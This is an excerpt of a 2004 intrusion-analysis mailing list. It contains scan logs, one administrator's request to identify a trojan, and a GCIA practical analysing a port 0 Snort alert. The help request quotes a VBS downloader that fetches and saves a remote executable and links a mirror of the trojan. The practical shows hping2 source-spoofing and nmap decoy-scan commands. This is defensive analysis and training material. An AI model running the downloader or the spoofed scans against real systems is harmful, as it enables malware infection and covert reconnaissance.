Jul 8 00:56:44 61.55.196.247:3358 -> xxx.yyy.174.8:1023 SYN ******S* [...] 
Jul 8 00:57:30 61.55.196.247:1226 -> xxx.yyy.194.68:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1220 -> xxx.yyy.194.84:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1283 -> xxx.yyy.194.100:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1286 -> xxx.yyy.194.102:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1284 -> xxx.yyy.194.101:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1321 -> xxx.yyy.194.121:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1311 -> xxx.yyy.194.112:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1323 -> xxx.yyy.194.124:9898 SYN ******S* Jul 8 00:57:30 61.55.196.247:1344 -> xxx.yyy.194.123:9898 SYN ******S* 9600 Jul 8 00:55:53 221.200.105.189:1947 -> xxx.yyy.194.125:5554 SYN ******S* Jul 8 00:55:54 221.200.105.189:2471 -> xxx.yyy.194.125:1023 SYN ******S* Jul 8 00:55:56 221.200.105.189:3465 -> xxx.yyy.194.125:9898 SYN ******S* Jul 8 00:55:53 221.200.105.189:1952 -> xxx.yyy.194.128:5554 SYN ******S* Jul 8 00:55:56 221.200.105.189:3469 -> xxx.yyy.194.128:9898 SYN ******S* Jul 8 00:55:53 221.200.105.189:1953 -> xxx.yyy.194.129:5554 SYN ******S* Jul 8 00:55:56 221.200.105.189:3470 -> xxx.yyy.194.129:9898 SYN ******S* Jul 8 00:55:53 221.200.105.189:1951 -> xxx.yyy.194.127:5554 SYN ******S* [...] 
Jul 8 00:57:10 221.200.105.189:2555 -> xxx.yyy.214.241:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2556 -> xxx.yyy.214.240:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2554 -> xxx.yyy.214.228:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2558 -> xxx.yyy.214.242:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2562 -> xxx.yyy.214.245:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2565 -> xxx.yyy.214.238:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2564 -> xxx.yyy.214.237:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2566 -> xxx.yyy.214.243:9898 SYN ******S* Jul 8 00:57:10 221.200.105.189:2584 -> xxx.yyy.214.244:9898 SYN ******S* 9132 Jul 8 00:56:38 202.69.92.104:1080 -> xxx.yyy.72.124:5554 SYN ******S* Jul 8 00:56:39 202.69.92.104:1517 -> xxx.yyy.72.124:1023 SYN ******S* Jul 8 00:56:38 202.69.92.104:1081 -> xxx.yyy.72.125:5554 SYN ******S* Jul 8 00:56:39 202.69.92.104:1524 -> xxx.yyy.72.125:1023 SYN ******S* Jul 8 00:56:41 202.69.92.104:2778 -> xxx.yyy.72.125:9898 SYN ******S* Jul 8 00:56:38 202.69.92.104:1082 -> xxx.yyy.72.126:5554 SYN ******S* Jul 8 00:56:39 202.69.92.104:1526 -> xxx.yyy.72.126:1023 SYN ******S* Jul 8 00:56:41 202.69.92.104:2779 -> xxx.yyy.72.126:9898 SYN ******S* [...] 
--
- Ken
===========================================================================
Ken Connelly (KC152)            Systems and Operations Manager, ITS - Network Services
University of Northern Iowa     Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu  phone: (319) 273-5850   fax: (319) 273-7373

From mducharme at cybergeneration.com Fri Jul 9 13:34:50 2004
From: mducharme at cybergeneration.com (Maxime Ducharme)
Date: Fri, 9 Jul 2004 09:34:50 -0400
Subject: [Intrusions] Need help to identify a trojan
Message-ID: <020e01c465b9$8268d500$a900a8c0@cybergeneration.com>

Hi to the list,

one of our customer's servers has been compromised and I'd need help to identify the trojan used.

Here is the server's setup:
- Windows 2000 OS (2 updates missing, KB870669 and KB839643)
- IIS 5.0 running with ASP applications
- Serv-U FTP Server v4.0
- not firewalled ... :(

I first found a file named "blabla.vbs" in C:\ which contains this script:

    Set xPost = CreateObject("Microsoft.XMLHTTP")
    xPost.Open "GET","http://www.angelfire.com/comics/mumucake/lsassvc.exe",0
    xPost.Send()
    Set sGet = CreateObject("ADODB.Stream")
    sGet.Mode = 3
    sGet.Type = 1
    sGet.Open()
    sGet.Write(xPost.responseBody)
    sGet.SaveToFile "lsassvc.exe",2

The lsassvc.exe is still on angelfire's web server, and I mirrored it here:
http://www.cybergeneration.com/security/2004.07.08/lsassvc.ex_

This file is bound to TCP port 753, and a connection on this port outputs this:

    220 jsdaus Microsoft FTP Service (Version 5.0)

Looks like a "special" FTP service. The program answers my "USER" and "PASS" commands:

    > USER test
    < 331 Password required for test.
    > PASS test
    < 530 Login incorrect.

It is also bound to a service named "Local Security Authority Service System".

Norton says this file is not infected, but it looks really suspicious; we already shut down the server for analysis. It has been used for scanning. Other hack tools have been found under C:\RECYCLER\speedy.

I'd like to know which kind of trojan it is, and if it has self-propagating behavior like some Ago-Gaobot.

Thanks for any help

Maxime Ducharme
Programmer / Network Security Specialist

From lindsay at issecurity.co.za Fri Jul 9 14:05:48 2004
From: lindsay at issecurity.co.za (Lindsay van Eden)
Date: Fri, 09 Jul 2004 16:05:48 +0200
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect Lindsay van Eden
Message-ID: <40EEA63C.5070106@issecurity.co.za>

Network Detect 1 - TCP Destination Port 0

    [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**]
    [Classification: Misc activity] [Priority: 3]
    07/16-19:11:40.464488 0:3:E3:D9:26:C0 -> 0:0:C:4:B2:33 type:0x800 len:0x42
    211.47.255.22:40844 -> 46.5.214.181:0 TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF
    ******S* Seq: 0xADA02A9A  Ack: 0x0  Win: 0x16D0  TcpLen: 32
    TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0

    07/16-19:11:40.464488 211.47.255.22:40844 -> 46.5.214.181:0
    TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF
    ******S* Seq: 0xADA02A9A  Ack: 0x0  Win: 0x16D0  TcpLen: 32
    TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0

1. Source of Trace

The raw log analyzed within this section was obtained from http://www.incidents.org/logs/raw/2002.6.16, with the following actions taken in determining the network layout, source and type of attack.

Viewing of trace file and overview of expressions used:

    tcpdump -neqr 2002.6.16 -c 2
    02:05:05.884488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 294: 61.83.144.42.1463 > 46.5.180.133.http: tcp 240 (DF)
    02:05:06.874488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 419: 61.83.144.42.1467 > 46.5.180.133.http: tcp 365 (DF)

    tcpdump -ner 2002.6.16 |more
    02:05:05.884488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 294: 61.83.144.42.1463 > 46.5.180.133.http: P 3698072451:3698072691(240) ack 3357659451 win 16824 (DF)
    02:05:06.874488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 419: 61.83.144.42.1467 > 46.5.180.133.http: P 3698689090:3698689455(365) ack 3351137157 win 17520 (DF)

    -n  No name resolution.
    -e  Print link-level header on each dump line.
    -q  Quick output.
    -r  Read packets from file
    -c  Count

Captured MAC addresses:

    tcpdump -ner 2002.6.16 |gawk '{print $2}' |sort -u
    0:0:c:4:b2:33
    0:3:e3:d9:26:c0

    cut -d            Remove delimited sections from each line
    sort              Sort lines from output
    gawk '{print$2}'  Pattern scanning and printing of second variable.

OUI Registration: http://standards.ieee.org/cgi-bin/ouisearch

    00-03-E3   (hex)        Cisco Systems, Inc.
    0003E3     (base 16)    Cisco Systems, Inc.
    00-00-0C   (hex)        CISCO SYSTEMS, INC.
    00000C     (base 16)    CISCO SYSTEMS, INC.

Associated addresses of MAC 0:3:e3:d9:26:c0:

    tcpdump -neqr 2002.6.16 ether src 0:3:e3:d9:26:c0 |awk '{print $5}' |sort -u
    12.107.51.109.http
    12.36.134.2.http
    128.102.196.25.39572
    128.167.120.16.http
    128.242.213.251.http
    129.186.1.198.ftp-data
    12.96.216.4.8276
    134.180.228.45.44326

Traffic going to MAC 0:3:e3:d9:26:c0:

    tcpdump -neqr 2002.6.16 ether src 0:3:e3:d9:26:c0 |awk '{print $7}' | awk -F \. '{print $1 "." $2 "." $3 "." $4}' |sort -u
    46.5.0.245
    46.5.100.65
    46.5.101.240
    46.5.102.170
    46.5.10.23
    46.5.103.183
    46.5.104.38
    46.5.110.39

    tcpdump -neqr 2002.6.16 ether src 0:3:e3:d9:26:c0 |awk '{print $7}' | awk -F \. '{print $1 "." $2 "." $3 "." $4}' |sort -u | wc -l
    142

Associated addresses of MAC 0:0:c:4:b2:33:

    tcpdump -neqr 2002.6.16 ether dst 0:0:c:4:b2:33 |awk '{print $7}' |sort -u
    46.5.0.245.http:
    46.5.100.65.printer:
    46.5.101.240.http:
    46.5.102.170.domain:
    46.5.10.23.printer:
    46.5.103.183.domain:
    46.5.104.38.http:
    46.5.110.39.http:
    46.5.11.16.printer:
    46.5.113.74.http:
    46.5.113.85.http:

Traffic going to MAC 0:0:c:4:b2:33:

    tcpdump -neqr 2002.6.16 ether src 0:0:c:4:b2:33 |awk '{print $7}' | awk -F \. '{print $1 "." $2 "." $3 "." $4}' |sort -u
    12.232.96.61
    12.252.53.145
    12.5.136.100
    130.166.151.185
    134.96.234.34
    141.35.14.47
    146.145.124.89
    156.143.35.241
    159.43.254.50
    194.225.40.7
    194.67.23.251
    194.67.35.196
    195.209.49.241

    tcpdump -neqr 2002.6.16 ether src 0:0:c:4:b2:33 |awk '{print $7}' | awk -F \. '{print $1 "." $2 "." $3 "." $4}' |sort -u | wc -l
    99

Based on the above findings, it would seem that 0:0:c:4:b2:33 has a consistent /16 range of addresses associated to it, while 0:3:e3:d9:26:c0 has a number of inconsistent or random addresses. Thus I conclude that the 46.5.0.0/16 network is the monitored range, with the latter being external.

    Un-trusted Network------External Cisco Device----|--------Perimeter Cisco Device--------Monitored Network
                            0:3:e3:d9:26:c0          |        0:0:c:4:b2:33
                                                     |
                                                   Snort

While reviewing the type of traffic captured, I noticed an interesting port and subsequently determined it was an incoming Syn to destination port 0:

    tcpdump -nnr 2002.6.16 | awk '{print $2 "\n"$4}' | awk -F \. '{print $5}' | awk -F : '{print $1}' | sort -u | awk '{if ($1<=1023) print $1}'
    0
    20
    21
    443
    515
    53
    80

    tcpdump -ner 2002.6.16 dst port 0
    19:11:40.464488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.40844 > 46.5.214.181.0: S 2912955034:2912955034(0) win 5840 (DF)
    19:11:43.444488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.40844 > 46.5.214.181.0: S 2912955034:2912955034(0) win 5840 (DF)
    19:11:49.354488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.40844 > 46.5.214.181.0: S 2912955034:2912955034(0) win 5840 (DF)
    19:12:01.534488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.40844 > 46.5.214.181.0: S 2912955034:2912955034(0) win 5840 (DF)

2. Detect was generated by:

The raw log was read by Snort Version 2.1.3.RC1 (Build 26), rules last modified June 19, 2004. No changes were made to the snort.conf file other than specifying the HOME_NET as 46.5.0.0/16. Alerts were generated with the following variables:

    snort -c snort.conf -dek none -r 2002.6.16 -l snortdump -q

    -c  Use Rules File
    -d  Dump the Application Layer
    -e  Display the second layer header info
    -k  Checksum mode (all,noip,notcp,noudp,noicmp,none)
    -r  Read and process tcpdump file
    -l  Log to directory
    -q  Quiet. Don't show banner and status report

    [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**]
    [Classification: Misc activity] [Priority: 3]
    07/16-19:11:40.464488 0:3:E3:D9:26:C0 -> 0:0:C:4:B2:33 type:0x800 len:0x42
    211.47.255.22:40844 -> 46.5.214.181:0 TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF
    ******S* Seq: 0xADA02A9A  Ack: 0x0  Win: 0x16D0  TcpLen: 32
    TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0

    [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**]
    [Classification: Misc activity] [Priority: 3]
    07/16-19:11:43.444488 0:3:E3:D9:26:C0 -> 0:0:C:4:B2:33 type:0x800 len:0x42
    211.47.255.22:40844 -> 46.5.214.181:0 TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF
    ******S* Seq: 0xADA02A9A  Ack: 0x0  Win: 0x16D0  TcpLen: 32
    TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0

    [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**]
    [Classification: Misc activity] [Priority: 3]
    07/16-19:11:49.354488 0:3:E3:D9:26:C0 -> 0:0:C:4:B2:33 type:0x800 len:0x42
    211.47.255.22:40844 -> 46.5.214.181:0 TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF
    ******S* Seq: 0xADA02A9A  Ack: 0x0  Win: 0x16D0  TcpLen: 32
    TCP Options (6) => MSS: 1460 NOP NOP SackOK NOP WS: 0

Explanation of alert:

    [**] [1:524:7] BAD-TRAFFIC tcp port 0 traffic [**]   Snort ID or SID and message
    [Classification: Misc activity] [Priority: 3]        Classification and Severity
    07/16-19:11:49.354488                                Date and time of alert
    0:3:E3:D9:26:C0                                      Source MAC address
    0:0:C:4:B2:33                                        Destination MAC address
    type:0x800                                           Encapsulating protocol Type IP
    len:0x42                                             Length of frame 66 Bytes
    211.47.255.22                                        Source address
    40844                                                Source port
    46.5.214.181                                         Destination address
    0                                                    Destination port
    TCP                                                  Protocol type TCP
    TTL:47                                               IP Time to live
    TOS:0x0                                              IP type of service
    ID:0                                                 IP Identification value
    IpLen:20                                             IP Header length
    DgmLen:52                                            Total datagram length
    DF                                                   Do not fragment bit set
    ******S*                                             SYN flag set
    Seq: 0xADA02A9A                                      Hex Sequence Number
    Ack: 0x0                                             Ack not set
    Win: 0x16D0                                          Window Size 5840
    TcpLen: 32                                           TCP header length
    TCP Options (6)                                      6 TCP options set
    => MSS: 1460                                         Maximum Segment Size
    NOP                                                  No operation
    NOP                                                  No operation
    SackOK                                               Selective Ack permitted
    NOP                                                  No operation
    WS: 0                                                Window scale 0

The following rule generated SID number 524, which can be found under $Snort/rules/bad-traffic.rules. SID 524 documentation can be viewed at http://www.snort.org/snort-db/sid.html?sid=524

    SID 524
    Message:    BAD-TRAFFIC tcp port 0 traffic
    Signature:  alert tcp $EXTERNAL_NET any <> $HOME_NET 0 (msg:"BAD-TRAFFIC tcp port 0 traffic"; flow:stateless; classtype:misc-activity; sid:524; rev:8;)

As TCP port 0 is an invalid destination port, normally indicating reconnaissance-type activity and, in more serious cases, system compromise, any traffic with a destination port of 0 will generate the alarm and should be regarded as suspicious.

3. Probability the source address was spoofed:

The use of Hping's default setting to port 0 has been mentioned in previous discussions (3). However, the evidence contained within this log file alone is simply not enough to conclusively determine the validity of host 211.47.255.22. A dig -x 211.47.255.22 reports that the range is assigned to Korea Network Information Center. A small concern, as many individuals believe that servers based in Korea and China are most frequently used in attacks.

    <<>> DiG 9.2.1 <<>> -x 211.47.255.22
    ;; global options:  printcmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 22506
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

    ;; QUESTION SECTION:
    ;22.255.47.211.in-addr.arpa.    IN      PTR

    ;; AUTHORITY SECTION:
    47.211.in-addr.arpa.    10708   IN      SOA     ns.krnic.net. domain.krnic.net. 2004060716 21600 900 604800 43200

Unfortunately, a 'dig any' reported the same information, and it would appear that the IP address currently has no further records.

There are a number of ways in which this attack could play out, with the following three scenarios likely candidates. Of course they remain unconfirmed, as the log file is generated by a pre-defined set of rules unbeknownst to myself.
* Scenario 1 Spoofed: Denial of Service

My first assumption when reviewing the type of traffic would be that the source address is in fact spoofed and perhaps part of a denial of service attack. Initial response would be to verify that 211.47.255.22 is not a customer network, remote branch, user or business critical site. The reason being that an Hping Syn connect to port 0 is so blatantly obvious that any IPS/NIDS would possibly have shunned this network/host, thus preventing a legitimate service. I was unable to find any other traffic within this log file, to or from the source address or range, that could verify the legitimacy of the source. Thus leading into the next possible scenario...

* Scenario 2 Spoofed: Reconnaissance Decoy

As previously mentioned, a Syn connect to port 0 would just about set off any NIDS alarm, alerting the firewall admin and IT staff. If an attacker, assuming they knew what they were doing, were using hping for host and network fingerprinting, it is very unlikely they would use the default port zero while purposely setting the Syn flag, as any hope of remaining undetected would be futile.

    hping2 -S -a 211.47.255.22 46.5.214.181 -j
    HPING 46.5.214.181 (eth0 46.5.214.181): S set, 40 headers + 0 data bytes

A typical response to this type of activity would be to review any "out of state" packets logged, assuming a stateful firewall were part of the perimeter defenses, and Syn connect floods, as more than likely the real source IP address would be among them. i.e. Nmap Hide Scan:

    * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys

* Scenario 3 IP ID Sequencing

The source address could either be spoofed (zombie) or a legitimate host. The attacker sends a Syn request to port 0 hoping for a reset packet, thus obtaining the IPID Sequence Generation information needed for session hi-jacking and OS fingerprinting.

4. Description of attack:

This appears to be more reconnaissance activity than an attack. TCP Syn packets are sent from 211.47.255.22 with random source ports to host 46.5.214.181, destination port 0. Typical characteristics of an idle host scan, provided the attacker receives a RST or ACK packet, as mentioned in scenario 3. Why destination Port 0 in particular is targeted is still unclear, as any standard firewall or access-controlled router should be configured to drop connections to port 0, unless the attacker's goal were to obtain information on the router access lists or firewall policy based on returned reject packets.

A shot in the dark, however vague, is that the traffic is an attempted random exploit of the vulnerability found in Xfree86, Fedora Core 1 and 2. The vulnerability could allow attackers to gain remote access via Xdm, on random TCP sockets, but remains unlikely due to the affected versions, release dates and current rule files.

CVE under review: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0419:

"XDM in XFree86 opens a chooserFd TCP socket even when DisplayManager.requestPort is 0, which could allow remote attackers to connect to the port, in violation of the intended restrictions."
Replicating the scan with Hping:

Original packet:

    19:13:25.404488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.42091 > 46.5.214.181.0: S 3000316664:3000316664(0) win 5840 (DF)
    19:13:37.454488 0:3:e3:d9:26:c0 0:0:c:4:b2:33 ip 66: 211.47.255.22.42091 > 46.5.214.181.0: S 3000316664:3000316664(0) win 5840 (DF)

Possible hping variables used:

    -s  --baseport      base source port
    -y  --dontfrag      set do not fragment flag
    -o  --tos           type of service
    -w  window size     set window size
    -S  syn flag        set syn flag
    -a  spoof source    spoof source address
    -H  --ipproto       set the IP protocol field, only in RAW IP mode
    -0  --rawip         RAW IP mode
    -d  --data          data size

    [root at fluffybunny lindsay]# hping2 -w 5840 -S -a 211.47.255.22 46.5.214.181
    HPING 46.5.214.181 (eth0 46.5.214.181): S set, 40 headers + 0 data bytes

Captured file on localhost:

    [root at fluffybunny lindsay]# tcpdump -ner hping host 46.5.214.181
    15:37:39.916038 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.22.1442 > 46.5.214.181.0: S 1421001844:1421001844(0) win 5840
    15:37:40.909743 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.22.1443 > 46.5.214.181.0: S 741291124:741291124(0) win 5840

Sample Debug to localhost:

    [root at fluffybunny lindsay]# hping2 -S -D -V 127.0.0.1
    DEBUG: Output interface address: 1.148.0.64
    DEBUG: if lo: OK using lo, addr: 127.0.0.1, MTU: 16436
    DEBUG: Trying to open PF_PACKET socket...
    DEBUG: PF_PACKET, SOCK_RAW open OK
    HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data bytes
    45 00 00 28 65 F3 00 00 40 06 00 00 7F 00 00 01
    7F 00 00 01 08 0A 00 00 6B 57 AA 5F 5A 22 BB FF
    50 02 02 00 7B FD 00 00
    len=40 ip=127.0.0.1 ttl=64 DF id=0 tos=0 iplen=40 sport=0 flags=RA seq=0 win=0 rtt=0.3 ms
    seq=0 ack=1800907360 sum=c94 urp=0
    45 00 00 28 F6 41 00 00 40 06 00 00 7F 00 00 01
    7F 00 00 01 08 0B 00 00 66 B3 BE 2E 05 15 EC 87
    50 02 02 00 91 56 00 00
    len=40 ip=127.0.0.1 ttl=64 DF id=0 tos=0 iplen=40 sport=0 flags=RA seq=1 win=0 rtt=0.3 ms
    seq=0 ack=1723055663 sum=e084 urp=0

5. Attack mechanism:

Like any other reconnaissance activity, an attempted idle session or fingerprint scan would notify the network admin that a potentially malicious host is gathering information about their network layout, type of operating systems, services and, most importantly, could be a prelude to an attack. Based on the same three scenarios previously mentioned, the attack mechanisms would be:

Scenario 1: Spoofed - Denial of Service

An attacker intent on stopping legitimate services could easily achieve their goal by deploying a denial of service or distributed denial of service attack on the targeted host or network, flooding their site with packets, utilizing their entire bandwidth allocation or causing a site crash. However, Internet Service Providers as well as vendors have become more affluent at minimizing the impact of the more common attacks such as teardrop, smurf, fragment and syn floods. As such, an alternative, or at least a more creative way to cause a denial of service, is using the target network's own IDS system against them, by setting off an alarm and causing the sensor to block or shun the source address range of a legitimate service. Basically, the attacker sends a spoofed packet to destination port zero, source address the target network. The crafted packet to destination port zero has a known IDS signature, which notifies the sensor management, in turn shunning the network host from any other attempted connections for a user defined period of time.

For this type of attack to be truly effective would require the attacker to have done their homework, in the sense of reconnaissance. They would have to be completely sure that IP address 211.47.255.22, possibly a natted firewall IP, requires business critical access to the 46.5.214.181 host/network. I remain skeptical about the likelihood of this scenario, as I was unable to find any correlation within the existing logs, nor verify the source address as a legitimate host or site.

Scenario 2: Spoofed Reconnaissance Decoy

Due to the sheer blatancy of the attack, my next assumption is that it is part of a reconnaissance decoy. The administrators would be so busy monitoring the type of traffic coming from the source address range or to destination port 0 that the actual reconnaissance activity would go unnoticed. Hping's use of random source addresses or nmap's use of decoys:

    Hping   --rand-source   random source address mode.
    Nmap    -Ddecoy

    nmap -v -sS -O -D211.47.255.22,211.47.255.21,211.47.255.20 46.5.214.181
    Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
    Host (46.5.214.181) appears to be up ... good.
    Initiating SYN Stealth Scan against (46.5.214.181)
    caught SIGINT signal, cleaning up

    tcpdump -ner log host 46.5.214.181
    12:03:03.489233 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 42: 211.47.255.22 > 46.5.214.181: icmp: echo request
    12:03:03.489338 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 42: 211.47.255.21 > 46.5.214.181: icmp: echo request
    12:03:03.489632 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 42: 211.47.255.21 > 46.5.214.181: icmp: echo request
    12:03:03.489814 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 42: 211.47.255.20 > 46.5.214.181: icmp: echo request
    12:03:03.489908 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.22.39975 > 46.5.214.181.http: . ack 711052103 win 2048
    12:03:03.489971 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: real.ip.host.39975 > 46.5.214.181.http: . ack 711052103 win 2048
    12:03:03.490031 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.21.39975 > 46.5.214.181.http: . ack 711052103 win 2048
    12:03:03.490091 0:c0:4f:2a:a:1b 0:d:29:54:1b:56 ip 54: 211.47.255.20.39975 > 46.5.214.181.http: . ack 711052103 win 2048

Unfortunately, there is no true means to conclusively justify this scenario, as there would ultimately appear to be no correlation of packets or data.
Scenario 3: IP ID sequencing

As port 0 is an illegitimate service, a SYN connect to port 0 on the target host will cause it to respond with a RST packet, provided the target host is not protected by a firewall of some sort. A way of identifying an IP ID increment with Nmap, for example, is to first identify a 'zombie' (1) host, i.e. Zombie Host A. By sending a SYN-ACK packet to the zombie, the host will respond with a RST packet; take note of the IP ID sequence number, i.e. 30001. Next, the attacker sends a spoofed packet with the source address of Zombie Host A, the target host responding with a RST. The attacker then sends another SYN-ACK to the zombie host, receiving a RST with IP ID sequence number 30002, indicating that the port is closed, with an IP ID increment of +1. A very simple reconnaissance technique with the tools Nmap and Hping (2), which is the most likely out of all three scenarios.

6. Correlations:

One of the earliest accounts of IP ID idle host scanning was first recorded by a Salvatore Sanfilippo way back in December of 1998. Originally posted to the bugtraq mailing list, followed by the author of Nmap, Fyodor's paper on Idle host scanning, released September of 2002.
http://www.insecure.org/nmap/idlescan.html
http://wiki.hping.org/8

Numerous forums and vendors have published papers, articles and discussions citing the threat associated with idle host scans, ultimately referring back to the original posting of Fyodor.

GCIA students making reference to Port 0 idle host scans include:
Jason B Anderson, Version 3.2 Detects
http://www.dshield.org/pipermail/intrusions/2002-October/005735.php
Barbara Morgan, Version 3.2 Detects
http://www.dshield.org/pipermail/intrusions/2002-September/005400.php
Patrick Patenaude, Version 3.3 Detects
http://www.dshield.org/pipermail/intrusions/2003-April/007432.php

7. Evidence of active targeting:

Captured in the 2002.6.16 log file is the same single host IP of 211.47.255.22, which initiated its scan at 19:11:40.464488, with a consistent destination IP address of 46.5.214.181, ending at 19:13:37.454488. This would at first appear to indicate active targeting; however, a known exploit cannot be verified, while at the same time it could be part of a larger network slow scan. To further substantiate my findings, I decided to review the logs from 2002.6.15, as well as 2002.6.17.

Logs - 2002.6.15
211.47.255.23 > 46.5.84.109    Started at 06:35:41.514488  Ended at 06:37:38.514488
211.47.255.22 > 46.5.227.153   Started at 17:16:12.164488  Ended at 17:18:09.164488
211.47.255.22 > 46.5.106.99    Started at 23:29:10.964488  Ended at 23:31:07.914488

Logs - 2002.6.17
211.47.255.21 > 46.5.29.60     Started at 07:43:56.674488  Ended at 07:45:53.674488
211.47.255.24 > 46.5.107.136   Started at 08:27:27.874488  Ended at 08:29:24.874488
211.47.255.24 > 46.5.15.88     Started at 15:01:06.604488  Ended at 15:03:03.604488

This to me would indicate a slow scan using addresses from the same source address allocation to random destination addresses, all within the 46.5/16 range.

8. Severity:

Severity = (criticality + lethality) - (system countermeasures + network countermeasures)
(2+3) - (2+4) = 0

Scale of 1 to 5 - 1 being the lowest, 5 being the highest.

Criticality = 2
The purpose of the destination address 46.5.214.181 is unknown, nor is there any other traffic destined to the IP on any other ports. As such, a conservative value of 2 has been assigned.

Lethality = 4
While most often considered reconnaissance activity and not of great lethality, network and host mapping could be a prelude to a later attack. More importantly, IPID sequencing or even the possibility that the machine has in fact already been compromised. Unauthorized network use.
System countermeasures = 2
Although no return traffic was seen in the log file, by default a host will respond to a TCP port 0 SYN connection with a RST ACK, which is after all the nature of TCP/IP. So unless a personal firewall were installed, the host would indeed respond.

Network countermeasures = 4
As previously mentioned, no return traffic was seen, so assume that there is a packet filtering device or firewall protecting the host in question.

9. Defensive recommendations:

Thankfully, most firewalls drop anything that is not explicitly permitted. So, provided one's firewall is configured correctly, there should be nothing to worry about. Unfortunately, this is not a perfect world and any firewall, router or packet-filtering device is only as strong as the policy it enforces. A "permit any any", which, believe it or not, is seen far too often, would certainly NOT protect against an attack, let alone this type of reconnaissance activity.

Defence in depth can easily be achieved just by using the existing hardware we are already aware of, which is two Cisco devices. Assuming one of them is a router, it is more than likely owned by the service provider or Telco. My first point of action would be to request the addition of very basic access lists. For example, implementing bogon routing (5) and RFC 1918 (4) if not already implemented, which any first tier service provider would do, thus reducing the use of bandwidth by unnecessary scans, spoofed addresses, general broadcasts etc.

Next, securing the customer side router with basic filtering similar to that configured on the perimeter firewall. Depending on the current load, perhaps even updating the code with support for the IOS firewall feature set / CBAC, i.e. any incoming domain transfers would be dropped and logged etc. An excellent reference would be the National Security Agency's Securing Cisco Routers Guide (6).

ip access-list extended [linetag]-access-filters
!
deny udp any any eq 69
deny udp any any eq 111
deny udp any any eq 2049
deny udp any any eq 31337 ! default backorifice port
permit udp any any
deny tcp any eq 20 any eq 2049
deny tcp any eq 20 any range 6000 6004
permit tcp any eq 20 any gt 1023
permit tcp any any gt 1023 established
!

10. Multiple choice test question:

15:01:32.949207 0:c0:4f:2a:a:1b 0:2:a5:28:8b:fe ip 54: HOSTA.2407 > HOSTB.8080: SF 275897171:275897171(0) win 512
15:01:32.949353 0:2:a5:28:8b:fe 0:c0:4f:2a:a:1b ip 60: HOSTB.8080 > HOSTA.2407: S 3625528744:3625528744(0) ack 275897172 win 57344 (DF)
15:01:32.949427 0:c0:4f:2a:a:1b 0:2:a5:28:8b:fe ip 54: HOSTA.2407 > HOSTB.8080: R 275897172:275897172(0) win 0 (DF)

What is wrong with the above connection, with the greatest cause for concern?

A) Destination port 8080 is indicative of a backdoor Trojan. The host has become infected as it is acknowledging the connection attempt; data has been compromised.
B) Both SYN and FIN flags are set, which should never occur under normal TCP connection attempts. Possible cause for alarm is the bypassing of stateful firewalls.
C) HOSTA is not listening on port 2047, which resets the connection, preventing a legitimate service.

Answer: B
While A is not entirely impossible, there are legitimate services such as proxy services which run on port 8080, while the SYN and FIN flags will never both be set.

From TEKenworthy at mar.med.navy.mil Fri Jul 9 14:06:17 2004
From: TEKenworthy at mar.med.navy.mil (Kenworthy, Thomas E. (CIV))
Date: Fri, 9 Jul 2004 10:06:17 -0400
Subject: [Intrusions] UDP port 137 packets being sent to Network and Broadcast addresses
Message-ID: <3462B20DF7B53644847EF43024736B1E036D3F78@marxchg04.mar.med.navy.mil>

